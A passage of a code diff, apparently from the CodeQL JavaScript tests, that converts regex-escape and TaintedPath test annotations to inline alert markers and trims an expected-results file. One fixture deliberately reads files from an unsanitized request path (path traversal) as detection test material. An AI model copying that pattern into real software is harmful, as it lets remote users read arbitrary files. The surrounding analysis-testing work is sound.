@@ -10,12 +8,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); -RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); -RegExp("\[\]\'\\,\.\/"); -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert +RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert +RegExp("\[\]\'\\,\.\/"); // $ Alert +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; @@ -38,7 +36,7 @@ RegExp("\\\\\\\\\a"); RegExp("\\\\\\\\\\a"); // string vs regexp -RegExp("\.") +RegExp("\.") // $ Alert "\."; // other @@ -53,21 +51,21 @@ RegExp("^\\\\Q\\\\E$"); RegExp("/\\*"); RegExp("/\ "); -RegExp("[\.]"); -RegExp("a[b\.c]d"); +RegExp("[\.]"); // $ Alert +RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 
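Review bot: The bare `// $ Alert` added to the six `RegExp("\…")` lines in the `@@ -10,12 +8,12 @@` hunk does not record which escapes are expected to be flagged, even though the updated `.expected` file lists four separate results for line 12 (`\B`, `\D`, `\P`, `\S`) and ten for line 13. Presumably the inline check is satisfied by any alert on an annotated line (worth confirming), in which case a regression that stops reporting one escape while another on the same line still fires would show up only in the `.expected` diff. A trailing description in the form the TaintedPath-es6.js hunk already uses would make the intent readable in place without shifting line numbers, for example `// $ Alert - \B, \D, \P and \S are reported` on the upper-case line. The same applies to the two template-literal lines in the `@@ -53,21 +51,21 @@` hunk, which each produce a `\k` and a `\d` result.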
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644 index 0183ac6ade66..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TaintedPathQuery -deprecated import utils.test.ConsistencyChecking - -deprecated class TaintedPathConsistency extends ConsistencyConfiguration { - TaintedPathConsistency() { this = "TaintedPathConsistency" } - - override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..573302c33cc5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,8 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..2c19dc96c898 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected 
@@ -1,661 +1,331 @@ -nodes -| TaintedPath-es6.js:7:7:7:44 | path | semmle.label | path | -| TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | semmle.label | parse(req.url, true) | -| TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | -| TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | -| TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | -| TaintedPath.js:9:7:9:48 | path | semmle.label | path | -| TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... 
e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... 
).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... 
, true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... 
l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... 
ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | -| examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | -| examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | -| examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | -| express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | -| handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | -| handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | -| handlebars.js:13:73:13:80 | filePath | semmle.label | filePath | -| handlebars.js:15:25:15:32 | filePath | semmle.label | filePath | -| handlebars.js:29:46:29:60 | req.params.path | semmle.label | req.params.path | -| handlebars.js:43:15:43:29 | req.params.path | semmle.label | req.params.path | -| normalizedPaths.js:11:7:11:27 | path | semmle.label | path | -| normalizedPaths.js:11:14:11:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:13:19:13:22 | path | semmle.label | path | -| normalizedPaths.js:14:19:14:29 | './' + path | semmle.label | './' + path | -| normalizedPaths.js:14:26:14:29 | path | semmle.label | path | -| normalizedPaths.js:15:19:15:22 | path | semmle.label | path | -| normalizedPaths.js:15:19:15:38 | path + '/index.html' | 
semmle.label | path + '/index.html' | -| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:16:35:16:38 | path | semmle.label | path | -| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:17:53:17:56 | path | semmle.label | path | -| normalizedPaths.js:21:7:21:49 | path | semmle.label | path | -| normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:21:35:21:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:23:19:23:22 | path | semmle.label | path | -| normalizedPaths.js:24:19:24:29 | './' + path | semmle.label | './' + path | -| normalizedPaths.js:24:26:24:29 | path | semmle.label | path | -| normalizedPaths.js:25:19:25:22 | path | semmle.label | path | -| normalizedPaths.js:25:19:25:38 | path + '/index.html' | semmle.label | path + '/index.html' | -| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:26:35:26:38 | path | semmle.label | path | -| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:27:53:27:56 | path | semmle.label | path | -| normalizedPaths.js:31:7:31:49 | path | semmle.label | path | -| normalizedPaths.js:31:14:31:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:31:35:31:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:36:19:36:22 | path | semmle.label | path | -| normalizedPaths.js:41:21:41:24 | path | semmle.label | path | -| normalizedPaths.js:54:7:54:49 | path | semmle.label | path | -| normalizedPaths.js:54:14:54:49 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | -| normalizedPaths.js:54:35:54:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:59:19:59:22 | path | semmle.label | path | -| normalizedPaths.js:63:19:63:22 | path | semmle.label | path | -| normalizedPaths.js:63:19:63:38 | path + "/index.html" | semmle.label | path + "/index.html" | -| normalizedPaths.js:68:21:68:24 | path | semmle.label | path | -| normalizedPaths.js:73:7:73:56 | path | semmle.label | path | -| normalizedPaths.js:73:14:73:56 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:73:35:73:55 | './' + ... ry.path | semmle.label | './' + ... ry.path | -| normalizedPaths.js:73:42:73:55 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:78:22:78:25 | path | semmle.label | path | -| normalizedPaths.js:82:7:82:27 | path | semmle.label | path | -| normalizedPaths.js:82:14:82:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:87:29:87:32 | path | semmle.label | path | -| normalizedPaths.js:90:31:90:34 | path | semmle.label | path | -| normalizedPaths.js:94:7:94:49 | path | semmle.label | path | -| normalizedPaths.js:94:14:94:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:94:35:94:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:99:29:99:32 | path | semmle.label | path | -| normalizedPaths.js:117:7:117:44 | path | semmle.label | path | -| normalizedPaths.js:117:14:117:44 | fs.real ... y.path) | semmle.label | fs.real ... y.path) | -| normalizedPaths.js:117:30:117:43 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:119:19:119:22 | path | semmle.label | path | -| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:120:35:120:38 | path | semmle.label | path | -| normalizedPaths.js:130:7:130:49 | path | semmle.label | path | -| normalizedPaths.js:130:14:130:49 | pathMod ... 
y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:130:35:130:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:135:21:135:24 | path | semmle.label | path | -| normalizedPaths.js:139:7:139:62 | path | semmle.label | path | -| normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:139:48:139:61 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:144:21:144:24 | path | semmle.label | path | -| normalizedPaths.js:148:7:148:58 | path | semmle.label | path | -| normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | semmle.label | 'foo/' ... y.path) | -| normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:148:44:148:57 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:151:21:151:24 | path | semmle.label | path | -| normalizedPaths.js:153:21:153:24 | path | semmle.label | path | -| normalizedPaths.js:160:7:160:49 | path | semmle.label | path | -| normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | -| normalizedPaths.js:160:35:160:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:165:19:165:22 | path | semmle.label | path | -| normalizedPaths.js:170:21:170:24 | path | semmle.label | path | -| normalizedPaths.js:174:7:174:27 | path | semmle.label | path | -| normalizedPaths.js:174:14:174:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:184:19:184:22 | path | semmle.label | path | -| normalizedPaths.js:187:21:187:24 | path | semmle.label | path | -| normalizedPaths.js:189:21:189:24 | path | semmle.label | path | -| normalizedPaths.js:192:21:192:24 | path | semmle.label | path | -| normalizedPaths.js:194:21:194:24 | path | semmle.label | path | -| normalizedPaths.js:199:21:199:24 | path | semmle.label | path | -| normalizedPaths.js:201:7:201:49 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:201:45:201:48 | path | semmle.label | path | -| normalizedPaths.js:205:21:205:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:208:21:208:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:210:21:210:34 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:214:7:214:49 | path | semmle.label | path | -| normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:214:35:214:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:219:3:219:33 | path | semmle.label | path | -| normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | semmle.label | decodeU ... t(path) | -| normalizedPaths.js:219:29:219:32 | path | semmle.label | path | -| normalizedPaths.js:222:21:222:24 | path | semmle.label | path | -| normalizedPaths.js:226:7:226:70 | path | semmle.label | path | -| normalizedPaths.js:226:14:226:49 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | -| normalizedPaths.js:226:14:226:70 | pathMod ... g, ' ') | semmle.label | pathMod ... g, ' ') | -| normalizedPaths.js:226:35:226:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:228:21:228:24 | path | semmle.label | path | -| normalizedPaths.js:236:7:236:47 | path | semmle.label | path | -| normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:236:33:236:46 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:238:19:238:22 | path | semmle.label | path | -| normalizedPaths.js:245:21:245:24 | path | semmle.label | path | -| normalizedPaths.js:250:21:250:24 | path | semmle.label | path | -| normalizedPaths.js:254:7:254:47 | path | semmle.label | path | -| normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:254:33:254:46 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:256:19:256:22 | path | semmle.label | path | -| normalizedPaths.js:262:21:262:24 | path | semmle.label | path | -| normalizedPaths.js:267:7:267:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:267:38:267:41 | path | semmle.label | path | -| normalizedPaths.js:270:21:270:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:275:7:275:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:275:17:275:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:275:38:275:41 | path | semmle.label | path | -| normalizedPaths.js:278:21:278:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:283:7:283:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | semmle.label | pathMod ... 
e(path) | -| normalizedPaths.js:283:38:283:41 | path | semmle.label | path | -| normalizedPaths.js:286:21:286:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:291:7:291:42 | newpath | semmle.label | newpath | -| normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| normalizedPaths.js:291:38:291:41 | path | semmle.label | path | -| normalizedPaths.js:296:21:296:27 | newpath | semmle.label | newpath | -| normalizedPaths.js:303:6:303:26 | path | semmle.label | path | -| normalizedPaths.js:303:13:303:26 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:304:18:304:21 | path | semmle.label | path | -| normalizedPaths.js:309:19:309:22 | path | semmle.label | path | -| normalizedPaths.js:313:19:313:22 | path | semmle.label | path | -| normalizedPaths.js:316:19:316:22 | path | semmle.label | path | -| normalizedPaths.js:320:6:320:49 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:320:23:320:49 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:320:45:320:48 | path | semmle.label | path | -| normalizedPaths.js:325:19:325:32 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:332:19:332:32 | normalizedPath | semmle.label | normalizedPath | -| normalizedPaths.js:339:6:339:46 | path | semmle.label | path | -| normalizedPaths.js:339:13:339:46 | pathMod ... y.path) | semmle.label | pathMod ... 
y.path) | -| normalizedPaths.js:339:32:339:45 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:341:18:341:21 | path | semmle.label | path | -| normalizedPaths.js:346:19:346:22 | path | semmle.label | path | -| normalizedPaths.js:354:7:354:27 | path | semmle.label | path | -| normalizedPaths.js:354:14:354:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:356:19:356:22 | path | semmle.label | path | -| normalizedPaths.js:358:7:358:51 | requestPath | semmle.label | requestPath | -| normalizedPaths.js:358:21:358:51 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:358:47:358:50 | path | semmle.label | path | -| normalizedPaths.js:363:21:363:31 | requestPath | semmle.label | requestPath | -| normalizedPaths.js:377:7:377:27 | path | semmle.label | path | -| normalizedPaths.js:377:14:377:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:379:19:379:22 | path | semmle.label | path | -| normalizedPaths.js:381:19:381:29 | slash(path) | semmle.label | slash(path) | -| normalizedPaths.js:381:25:381:28 | path | semmle.label | path | -| normalizedPaths.js:385:7:385:46 | path | semmle.label | path | -| normalizedPaths.js:385:14:385:46 | pathMod ... uery.x) | semmle.label | pathMod ... uery.x) | -| normalizedPaths.js:385:35:385:45 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:388:19:388:22 | path | semmle.label | path | -| normalizedPaths.js:399:21:399:24 | path | semmle.label | path | -| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | semmle.label | pathMod ... t('/')) | -| normalizedPaths.js:407:45:407:55 | req.query.x | semmle.label | req.query.x | -| normalizedPaths.js:407:45:407:66 | req.que ... it('/') | semmle.label | req.que ... it('/') | -| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | semmle.label | pathMod ... 
